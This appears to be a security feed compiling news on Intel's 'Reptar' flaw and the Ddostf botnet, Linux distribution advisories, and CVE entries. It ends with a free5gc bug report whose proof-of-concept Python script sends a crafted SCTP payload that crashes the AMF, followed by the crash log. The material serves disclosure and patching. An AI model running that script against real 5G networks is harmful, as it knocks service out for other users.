By Deeba Ahmed
Intel CPU Vulnerability Impacts Multi-Tenant Virtualized Environments.
This is a post from HackRead.com Read the original post: Google Reveals ‘Reptar’ Vulnerability Threatening Intel Processors

Google has discovered a new security vulnerability in Intel CPUs that could let attackers execute code on vulnerable systems. The vulnerability has been named “Reptar” by Google and affects numerous Intel CPUs, including those utilized in cloud computing environments.

****What is Reptar Vulnerability?****

Reptar is a side-channel vulnerability tracked as CVE-2023-23583. It allows attackers to leak information from a vulnerable system and use it to steal sensitive data such as credit card numbers, passwords, etc.

The vulnerability was discovered by Google’s Information Security Engineering team, which notified Intel and industry partners about the issue, and mitigations were rolled out before its public disclosure.

****How Was Reptar Discovered?****

According to Google’s blog post, a company’s security researcher discovered it in the way the CPU interprets redundant prefixes, and if successfully exploited, it allows attackers to bypass the CPU’s security boundaries.

For your information, prefixes allow users to change how instructions behave by disabling/enabling different features. Those prefixes that don’t make sense or conflict with other prefixes are called redundant prefixes. Such prefixes are generally ignored.

****How does Reptar work?****

Reptar works by exploiting an issue in the way speculative execution is handled by Intel CPUs. Speculative execution is a technique that allows CPUs to execute instructions before being fully validated. Although this technique is time-saving, it can make CPUs vulnerable to side-channel attacks.

The Reptar vulnerability is a serious risk to multi-tenant virtualized environments, where the exploit causes the host machine to crash on a guest machine, resulting in a denial of service to other guest machines connected to the same host. In addition, it could lead to privilege escalation or information disclosure.

In a multi-tenant virtualized environment, multiple tenants share the same physical hardware, so if one tenant is infected with Reptar, the attacker has access to the other tenants’ data through the same vulnerability.

Aubrey Perin, Lead Threat Intelligence Analyst at Qualys, a Foster City, Calif.-based provider of disruptive cloud-based IT, security and compliance solutions commented on the issue stating, “Unmitigated, this bug could be serious as an attacker could start testing to see if there is any order to the seemingly random outputs. As it stands, it sounds more like an oddity that could be used to take systems down.”

Mr Perin further explained that “Without reviewing the catalogue of patches, it’s hard to say that it’s atypical of the bugs usually found. In this case, where it can cause crashes, security teams should definitely prioritize the patch implementation to eliminate the risk of failure.”

“Researchers do find vulnerabilities all the time, often for bounty, and it benefits users when responsible disclosure practices are followed. Google is a very good practitioner of responsible disclosure, and you can often find references to the researcher or organization who disclosed the vulnerability in the notes associated with patches,” he added.

****Intel’s Response****

Intel has released an advisory to confirm the issue, explaining that the issue was discovered in some Intel processors caused by an error in the CPU’s handling of redundant prefixes. The company has released a patch for the issue. It was assigned a CVSS score of 8.8 and declared a High-security vulnerability.

This CPU vulnerability impacts several Intel desktop, mobile, and server CPUs., including 10th Generation Intel® Core™ Processor Family, 3rd Generation Intel® Xeon® Processor Scalable Family, Intel® Xeon® D Processor, and 11th Generation Intel® Core Processor Family, and CPUs used in cloud computing environments, etc.

The company is working on a long-term fix. In the meantime, it is advising users to patch their devices immediately.

****_RELATED ARTICLES_****

1.  **Intel Responds to ‘Downfall’ Attack with Firmware Updates**
2.  **Plundervolt: A new attack on Intel processors threatening SGX data**
3.  **High severity Intel chip flaw left cars, medical, IoT devices vulnerable**

Google Reveals ‘Reptar’ Vulnerability Threatening Intel Processors

Ubuntu Security Notice 6485-1 - Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, Alyssa Milburn, Hisham Shafi, Nir Shlomovich, Tavis Ormandy, Daniel Moghimi, Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela, Doug Kwan, and Kostik Shtoyk discovered that some Intel Processors did not properly handle certain sequences of processor instructions. A local attacker could possibly use this to cause a core hang , gain access to sensitive information or possibly escalate their privileges.

    ==========================================================================Ubuntu Security Notice USN-6485-1November 17, 2023intel-microcode vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:The system could be made to crash or expose sensitive information under certainconditions.Software Description:- intel-microcode: Processor microcode for Intel CPUsDetails:Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, Alyssa Milburn,Hisham Shafi, Nir Shlomovich, Tavis Ormandy, Daniel Moghimi, Josh Eads, SalmanQazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela, Doug Kwan, and KostikShtoyk discovered that some Intel(R) Processors did not properly handle certainsequences of processor instructions. A local attacker could possibly use this tocause a core hang (resulting in a denial of service), gain access to sensitiveinformation or possibly escalate their privileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  intel-microcode                 3.20231114.0ubuntu0.23.10.1Ubuntu 23.04:  intel-microcode                 3.20231114.0ubuntu0.23.04.1Ubuntu 22.04 LTS:  intel-microcode                 3.20231114.0ubuntu0.22.04.1Ubuntu 20.04 LTS:  intel-microcode                 3.20231114.0ubuntu0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):  intel-microcode                 3.20231114.0ubuntu0.18.04.1+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):  intel-microcode                 3.20231114.0ubuntu0.16.04.1+esm1After a standard system update you need to reboot your computer to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-6485-1  CVE-2023-23583Package Information:  https://launchpad.net/ubuntu/+source/intel-microcode/3.20231114.0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/intel-microcode/3.20231114.0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/intel-microcode/3.20231114.0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/intel-microcode/3.20231114.0ubuntu0.20.04.1

Ubuntu Security Notice USN-6485-1

Debian Linux Security Advisory 5557-1 - WebKitGTK has vulnerabilities. Junsung Lee discovered that processing web content may lead to a denial-of-service. An anonymous researcher discovered that processing web content may lead to arbitrary code execution.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5557-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
November 17, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-41983 CVE-2023-42852

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-41983

    Junsung Lee discovered that processing web content may lead to a  
    denial-of-service.

CVE-2023-42852

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.2-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.2-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmVWsEgACgkQAAyEYu0C  
2ALSaxAAlUplCgENdVCJvbf2cRhZiJeQvEm71xLR972uesvSaBr+NsQacz+lv6qU  
3U8iq4ulY8Y4o8rv3TbIrxF+WvMWYq8U7a8vqrY66W++u4//L5INYvuIxaNwoonV  
+r30K0tJ2exsbTdQVCSHe2dB8aOf1qLWJHpwgnYuSIZRS1rBxSrxTUuJizZsUXi5  
Y4l4KRdGIuv/e+kIkxKDCxeFHI3bmHJEZiDnNG8ohVSxmWPqjNFh9ZBYcFynVoFr  
hrqc076Py5ok4AYLgnH2rW8/33NCsh08IINqRovR6cSkOLL9KZFSeKWAKZunbrjb  
Ptp3wZSANh5pYBl7cbxXvam+gakgkkZg9hNoe+RJjRBwEUylURODK6+dBNXbO1mr  
JQqajMyXnUWT8JakalV0Ioi6KKQR6Qpp7OGTdoLlrnh1oXAjrbDTtwk6Zn2LEWwr  
THCH4roBbVKPXG0LJRGntWnt/qRVMjnmmCY1xOzs/Y+5tuR0ChtlZueGrL1t9kSQ  
EVMU7MZ3jBz0l0ZkzWFMXzSNXQK6m0Vef1vS9JZkNyc+sBmtrDQfJu+qf17z1RUz  
56FuYfVi4f+P+IxyLnh5MTssR8QjLR1WCVZBiTyfIyNtl6oOCFJ9UTrQC8QnycD6  
tHJfHHwwAp5HucG6zaJHZ3KV4BOuL6bNV0SChvlCc13dnTyyGv4=  
=zn+t  
-----END PGP SIGNATURE-----

Debian Security Advisory 5557-1

Red Hat Security Advisory 2023-7335-01 - An update is now available for Red Hat Process Automation Manager including images for Red Hat OpenShift Container Platform. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7335.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Updated Red Hat Process Automation Manager 7.13.4 SP2 Images  
Advisory ID:        RHSA-2023:7335-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7335  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-44487  
====================================================================

Summary: 

An update is now available for Red Hat Process Automation Manager including images for Red Hat OpenShift Container Platform.

Description:

Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.

This release includes security fixes.

Security Fix(es):

* netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* Quarkus: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* EAP XP: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* EAP: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* businessautomation-operator: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.

For more details about the security issues, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE pages listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-44487

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803

Red Hat Security Advisory 2023-7335-01

Red Hat Security Advisory 2023-7334-01 - An update for rh-varnish6-varnish is now available for Red Hat Software Collections. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7334.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-varnish6-varnish security updateAdvisory ID:        RHSA-2023:7334-01Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7334Issue date:         2023-11-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for rh-varnish6-varnish is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2242803

Red Hat Security Advisory 2023-7334-01

@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a minor denial of service while attempting to parse CSS. Exploitation of this issue does not require user interaction or privileges.

Moderate

holblin published GHSA-hpx4-r86g-5jrg

Aug 29, 2023

**Package**

npm @adobe/css-tools (npm)

**Affected versions**

<4.3.1

**Patched versions**

4.3.1

**Description**

**Impact**

@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS.

**Patches**

The issue has been resolved in 4.3.1.

**Workarounds**

None

**References**

N/A

**Severity**

Moderate

5.0

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

Low

User interaction

None

Scope

Changed

Confidentiality

None

Integrity

None

Availability

Low

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L

**CVE ID**

CVE-2023-26364

**Weaknesses**

CWE-20 CWE-1333

CVE-2023-26364: Regular Expression Denial of Service (ReDOS) while Parsing CSS

By Deeba Ahmed
The Ddostf Botnet was initially identified in 2016.
This is a post from HackRead.com Read the original post: Ddostf Botnet Resurfaces in DDoS Attacks Against MySQL and Docker Hosts

Researchers claim that the Chinese Ddostf botnet is specifically designed for launching DDoS attacks and that the threat actors are operating a DDoS-for-hire service.

AhnLab Security Emergency Response Center (ASEC) researchers have shared alarming **details** of a new campaign targeting MySQL servers and Docker hosts with DDoS malware.

AhnLab noted that attacks targeting MySQL servers on Windows systems have increased sharply, and vulnerable servers are infected with the Chinese botnet Ddostf, **discovered** in 2016.

Researchers claim that this malware is specifically designed for launching DDoS attacks and that the threat actor is operating a **DDoS-for-hire service**.

According to the AESC blog post, threat actors scan for exploitable MySQL servers. After compromising the servers, threat actors install the Ddostf DDoS botnet to launch distributed denial-of-service (DDoS) attacks against other servers.

**MySQL servers** are a common target in such campaigns because of their widespread use in Windows and Linux environments. Although MS-SQL is a preferred database service for Windows users, MySQL servers are also commonly used on Windows, which makes the systems running them a prime target for cybercriminals.

Based on data from AhnLab’s Smart Defense (ASD) logs, most malware targeting vulnerable MySQL servers were **Gh0st RAT** variants, but instances of **AsyncRAT** were also observed and recently, there’s been an uptick in the use of the Ddostf botnet.

Ddostf is a powerful malware that copies itself with a random name in the %SystemRoot% directory and registers as a service before decrypting the encrypted C2 server URL string to connect to the attackers’ server. It can collect system data and transfer it to the C2 server. Then it waits for specific commands (e.g., SYN, UDP, and HTTP GET/POST floods) to launch the **DDoS attacks**.

The botnet is unique because it can connect to a new address from the C2 server and execute commands there for a limited time. This helps the Ddostf botnet operator to infect multiple systems and sell DDoS attacks as a service. Ddostf can target Linux and Windows systems because of supports both ELF and PE formats and can achieve persistence. 

Attackers first scan for publicly accessible systems using port 3306/TCP and after accessing the server (those with known vulnerabilities or weak credentials), they use brute-force or dictionary attacks on the system.

If the system has signs of poor credential management, attackers can gain access to administrator account credentials. If the system runs an **unpatched version with vulnerabilities**, attackers can exploit them to execute commands without needing these processes. Unlike MS-SQL, which entails direct OS command execution methods, MySQL relies on UDFs (User-Defined Functions) that can allow threat actors to execute commands.

They can also install malicious UDF DLLS on infected MySQL servers and execute commands. Like CLR Stored Procedure WebShell work, these DLLs can provide threat actors complete control of the infected system. In the case of the Ddostf DDoS bot, attackers use the UDF malware as a tool to install it on poorly managed MySQL servers.

Database servers get frequently targeted because of poorly managed account credentials. Administrators must use strong passwords apart from applying the latest patches to protect their servers. Firewalls can be used to restrict access to external actors, and a DDoS mitigation service can help protect against **large-scale attacks**.

****_RELATED ARTICLES_****

1.  **Who Killed the Mozi IoT Zombie Botnet – India or China?**
2.  **Chinese APT Posing as Cloud Services to Spy on Cambodia**
3.  **Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks**
4.  **How Chinese Hackers Stole Signing Key to Breach Outlook Accounts**
5.  **Chinese Scammers Exploit Cloned Websites in Vast Gambling Network**

Ddostf Botnet Resurfaces in DDoS Attacks Against MySQL and Docker Hosts

An issue was discovered in the captive portal in OpenNDS before version 10.1.3. It has multiple memory leaks due to not freeing up allocated memory. This may lead to a Denial-of-Service condition due to the consumption of all available memory.

opennds (10.1.3)

Security Advisory. This version contains fixes for multiple potential security vulnerabilities  
Credit - Stanislav Dashevskyi - standash.github.io \[standash\]  
It also contains some minor bug fixes

*   Fix - Buffer overflow causing segfault - CVE-2023-41101 \[bluewavenet\]
*   Fix - Memory leaks due to passing allocated buffer into safe\_asprintf() - CVE-2023-41102 \[bluewavenet\]
*   Fix - Remove deprecated preauth option \[bluewavenet\]
*   Fix - missing free in show\_preauth\_page if MHD does not respond \[bluewavenet\]
*   Fix - more safe\_asprintf memory leaks \[bluewavenet\]
*   Fix - missing free for mark\_auth \[bluewavenet\]
*   Fix - memory leak after starting authmon daemon \[bluewavenet\]
*   Fix - memory leak in encode\_and\_redirect\_to\_splashpage \[bluewavenet\]
*   Fix - Community themespec, voucher css and logo image \[bluewavenet\]
*   Fix - ThemeSpec, path to logo in page footer \[bluewavenet\]
*   Fix - ensure gatewayurl is urldecoded to fix broken css and images in themespec \[bluewavenet\]
*   Add - set default fas remote fqdn to disabled \[bluewavenet\]

\-- Rob White dot@blue-wave.net Sat, 28 Aug 2023 09:46:35 +0000

CVE-2023-41102: Release OpenNDS v10.1.3 release · openNDS/openNDS

An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component.

**Free5gc allows a local attacker to cause a denial of service via the free5gc-compose component**

High severity GitHub Reviewed Published Nov 17, 2023 to the GitHub Advisory Database • Updated Nov 17, 2023

GHSA-q27h-hw2v-x5jm: Free5gc allows a local attacker to cause a denial of service via the free5gc-compose component

**Describe the bug**

When I try to send a captured UE registration request message to the AMF, the log shows 'sctp accept from ,' and the AMF crashes, causing disconnection for other UEs as well.

**To Reproduce**

Steps to reproduce the behavior:

1.  Using free5gc-compose to establish the AMF.
2.  run free5gc with default config.
3.  Run the following POC python script  
    \`import sys, sctp, socket

if len(sys.argv) != 2:  
print("Usage: free5gc.py server-address")  
exit(0)

sk = sctp.sctpsocket\_tcp(socket.AF\_INET)  
sk.connect((sys.argv\[1\], 38412))  
ue\_request=b'\\x00\\x0f\\x40\\x48\\x00\\x00\\x05\\x00\\x55\\x00\\x02\\x00\\x01\\x00\\x26\\x00\\x1a\\x19\\x7e\\x00\\x41\\x79\\x00\\x0d\\x01\\x02\\xf8\\x39\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x30\\x2e\\x04\\xf0\\xf0\\xf0\\xf0\\x00\\x79\\x00\\x13\\x50\\x02\\xf8\\x39\\x00\\x00\\x00\\x01\\x00\\x02\\xf8\\x39\\x00\\x00\\x01\\xe8\\xe8\\x7e\\xd4\\x00\\x5a\\x40\\x01\\x18\\x00\\x70\\x40\\x01\\x00'  
sk.sctp\_send(ue\_request, ppid=socket.htonl(60))

sk.close()\`

**Expected behavior**

I have sent the registration request of a UE that has already completed registration, so the expected behavior should be a notification that the user is already registered and a rejection of the request.However, the AMF crashed

**Screenshots**

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04.1 live-server
*   Kernel version: 5.4.0-165-generic

**Trace File****Configuration File**

Use the default config file.

**PCAP File**

crash.zip

**Log File**

amf              | 2023-10-29T11:42:37.467203444Z [INFO][AMF][Ngap] [AMF] SCTP Accept from: <nil> amf              | 2023-10-29T11:42:37.467906401Z [FATA][AMF][Ngap] panic: runtime error: invalid memory address or nil pointer dereference amf              | goroutine 137 [running]: amf              | runtime/debug.Stack() amf              |      /usr/local/go/src/runtime/debug/stack.go:24 +0x65 amf              | github.com/free5gc/amf/internal/ngap/service.handleConnection.func1() amf              |      /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:184 +0x58 amf              | panic({0xbb3280, 0x13088a0}) amf              |      /usr/local/go/src/runtime/panic.go:1038 +0x215 amf              | github.com/free5gc/amf/internal/ngap.Dispatch({0xdf2988, 0xc0001ec020}, {0xc0008ce000, 0x40000, 0x40000}) amf              |      /go/src/free5gc/NFs/amf/internal/ngap/dispatcher.go:19 +0xac amf              | github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0001ec020, 0x40000, {0xd03d48, 0xd03d58, 0xd03d50}) amf              |      /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:237 +0x417 amf              | created by github.com/free5gc/amf/internal/ngap/service.listenAndServe amf              |      /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:158 +0x9fe n3iwf            | 2023-10-29T11:42:37.490422713Z [WARN][N3IWF][NGAP] [SCTP] Close connection. n3iwf            | 2023-10-29T11:42:37.490494299Z [INFO][N3IWF][NGAP] NGAP receiver stopped n3iwf            | 2023-10-29T11:42:37.490506087Z [INFO][N3IWF][NGAP] NGAP server stopped ueransim         | [2023-10-29 11:42:37.490] [sctp] [debug] SCTP association shutdown (clientId: 2) ueransim         | [2023-10-29 11:42:37.491] [sctp] [warning] Unhandled SCTP notification received ueransim         | [2023-10-29 11:42:37.491] [ngap] [error] Association terminated for AMF[2] ueransim         | [2023-10-29 11:42:37.491] [ngap] [debug] Removing AMF context[2] 

**Additional context**

This security issue could allow anyone to send an message that would cause an amf denial of service and severely affect other users.

CVE-2023-47025: [Bugs]Amf crashed when failed to resolve the IP of ngap message , resulting in a null pointer reference. · Issue #501 · free5gc/free5gc

Tag

#dos